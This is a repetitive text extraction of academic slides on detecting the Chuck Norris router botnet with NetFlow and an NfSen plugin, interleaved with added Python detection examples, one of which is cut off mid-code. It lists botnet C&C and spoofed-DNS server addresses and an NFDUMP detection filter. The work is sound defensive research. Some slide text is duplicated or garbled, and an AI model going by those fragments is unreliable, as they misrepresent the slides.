cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers

Known IP Addresses
- Web server addresses: 87.98.173.190, 87.98.163.86
- IRC server addresses: 87.98.173.190, 87.98.163.86
- IRC server port: 12000
- OpenDNS server addresses: 208.67.222.222, 208.67.220.220
- Spoofed DNS server: 87.98.163.86

This data is used in the detection methods by default.
IP address updates are published on the project page.
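The Phase IV NFDUMP filter, the ADSL string check and the default server addresses above, implemented together as an added example (not the NfSen plugin's own code); the flow CSV, the 192.0.2.0/24 local network and the reverse-DNS answers are constructed input.

```python
"""Detection logic from the DNS spoofing (Phase IV) and ADSL string slides,
run over constructed flow records.

Added example, not the NfSen plugin's code. The flow records are a
constructed, simplified CSV (src,dst,proto,dport,packets), not real nfdump
output; the reverse-DNS and WHOIS maps and the 192.0.2.0/24 local network
are constructed as well. The resolver addresses come from the
"Known IP Addresses" slide.
"""
import csv
import io
import ipaddress
import json
import re

# Defaults from the presentation's "Known IP Addresses" slide.
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}
# Constructed local network (TEST-NET-1); replace with the monitored range.
LOCAL_NETWORK = ipaddress.ip_network("192.0.2.0/24")
UDP = 17
ADSL_RE = re.compile(r"adsl", re.IGNORECASE)

# Constructed flow records: header plus one flow per line.
SAMPLE_FLOWS = """src,dst,proto,dport,packets
192.0.2.10,208.67.222.222,17,53,12
192.0.2.10,87.98.163.86,17,53,3
192.0.2.20,208.67.220.220,17,53,5
192.0.2.30,198.51.100.53,17,53,40
198.51.100.7,87.98.163.86,17,53,2
192.0.2.40,87.98.163.86,6,80,9
"""
# Constructed reverse-DNS answers for the local hosts above.
SAMPLE_REVERSE_DNS = {
    "192.0.2.10": "10-2-0-192.adsl.example.net",
    "192.0.2.20": "workstation20.example.edu",
}


def phase4_filter(flow_csv, local_network=LOCAL_NETWORK):
    """Equivalent of the slide's NFDUMP filter:
    (src net local_network) and ((dst ip OpenDNS) or (dst ip spoofed DNS))
    and (proto UDP) and (dst port 53).
    Returns one dict per matching flow, tagged with the matched server set."""
    hits = []
    for row in csv.DictReader(io.StringIO(flow_csv)):
        src = ipaddress.ip_address(row["src"])
        if src not in local_network:
            continue                      # only queries leaving the local network
        if int(row["proto"]) != UDP or int(row["dport"]) != 53:
            continue                      # DNS over UDP/53 only
        if row["dst"] in SPOOFED_DNS_SERVERS:
            kind = "spoofed_dns"          # targeted queries to the attacker's resolver
        elif row["dst"] in OPENDNS_SERVERS:
            kind = "opendns"              # common queries the bot forwards to OpenDNS
        else:
            continue
        hits.append({"src": str(src), "dst": row["dst"], "kind": kind,
                     "packets": int(row["packets"])})
    return hits


def has_adsl_string(text):
    """ADSL string check on a reverse-DNS hostname or WHOIS record text."""
    return bool(ADSL_RE.search(text or ""))


def assess_hosts(flow_csv, reverse_dns, whois=None):
    """Correlate the Phase IV hits per local host and corroborate them with
    the ADSL string check, the way the plugin chains its methods.
    A host that queried the spoofed resolver is reported as infected; a host
    that only reached OpenDNS is suspicious, with the ADSL flag as evidence."""
    whois = whois or {}
    report = {}
    for hit in phase4_filter(flow_csv):
        entry = report.setdefault(hit["src"], {"spoofed_dns": 0, "opendns": 0})
        entry[hit["kind"]] += hit["packets"]
    for host, entry in report.items():
        entry["adsl"] = (has_adsl_string(reverse_dns.get(host))
                         or has_adsl_string(whois.get(host)))
        entry["verdict"] = "infected" if entry["spoofed_dns"] else "suspicious"
    return report


if __name__ == "__main__":
    print(json.dumps(assess_hosts(SAMPLE_FLOWS, SAMPLE_REVERSE_DNS), indent=2))
```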
Part IV
NfSen Botnet Detection Plugin

Botnet Detection Plugin

Plugin Features
- Detects Chuck Norris-like botnet behavior
- Based on NetFlow and other network data sources
- Processes data regularly and provides real-time output

Plugin Architecture
- Compliant with NfSen plugin architecture recommendations
- PHP frontend with a Perl backend and a PostgreSQL DB
- Web, e-mail and syslog detection output and reporting
Plugin Architecture

[Diagram: BACKEND with cndet.pm and cndetdb.pm talking to the nfsend communication interface, FRONTEND with cndet.php; data sources NetFlow data, DNS and WHOIS db; results stored in PostgreSQL]
Plugin Methods Architecture

[Diagram: cndetdb.pm backed by PostgreSQL, reading NetFlow data, DNS and the WHOIS db, feeding the detection methods below]

- Telnet scan detection
- Botnet distribution sites detection
- Botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
Web Interface – Infected Host Detected

[Screenshot: plugin web interface listing a detected infected host]

Part V
Conclusion
Detection Plugin and Other Botnets

Botnet Lifecycle Similar for Majority of Botnets
- scanning for possible bots
- infection of vulnerable devices
- bot initialization/update
- botnet operation

Botnet Detection Plugin Customization
- modular plugin engine
- easy modification for detection of other botnets
- detection methods need to be customized
- plugin distributed under the BSD license
Conclusion: Network Devices Are Not Protected
- Routers, access points, printers, cameras, TVs
- No AV software, missing patches and firmware updates
- But they should be protected

Experience
- NetFlow can monitor all such devices in the network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection

Future
- Chuck Norris is down, but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- The detection plugin is available at our project site
Thank You For Your Attention

Vojtěch Krmíček, Tomáš Plesník
vojtec|plesnik@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber

Detecting Botnets with NetFlow

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behavior
Based on NetFlow and other network data sources
Processes data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugin architecture recommendations
PHP frontend with a Perl backend and a PostgreSQL DB
Web, e-mail and syslog detection output and reporting
Krmíček, Plesník: Detecting Botnets with NetFlow, 21/28
Plugin Architecture
Diagram (labels recovered from the slide build-up): BACKEND: cndet.pm and cndetdb.pm with PostgreSQL, fed by NetFlow data, DNS and the WHOIS db; FRONTEND: cndet.php; the backend and the frontend communicate over the nfsend comm interface.
Plugin Methods Architecture
Diagram (labels recovered from the slide build-up): cndetdb.pm at the centre, connected to PostgreSQL, NetFlow data, DNS and the WHOIS db, with the five detection methods built on it:
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
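Telnet scan detection, the first method in the diagram, as an added example written in Python rather than the plugin's Perl (this is not the plugin's own code): it parses constructed nfdump-style flow lines and reports a source that sends single-packet TCP/23 probes to many distinct hosts. The line layout, the thresholds and the sample addresses are assumptions.

```python
"""Flow-based Telnet scan detection (added example; not the NfSen plugin's own
code).  A host that opens many single-packet TCP/23 flows to distinct
destinations inside one window looks like a bot hunting for new victims.
The nfdump-like line layout, thresholds and sample addresses are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed text layout: "date time proto src:port -> dst:port flags pkts bytes"
FLOW_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<proto>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<flags>\S+)\s+(?P<pkts>\d+)\s+(?P<octets>\d+)$"
)


@dataclass(frozen=True)
class Flow:
    ts: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
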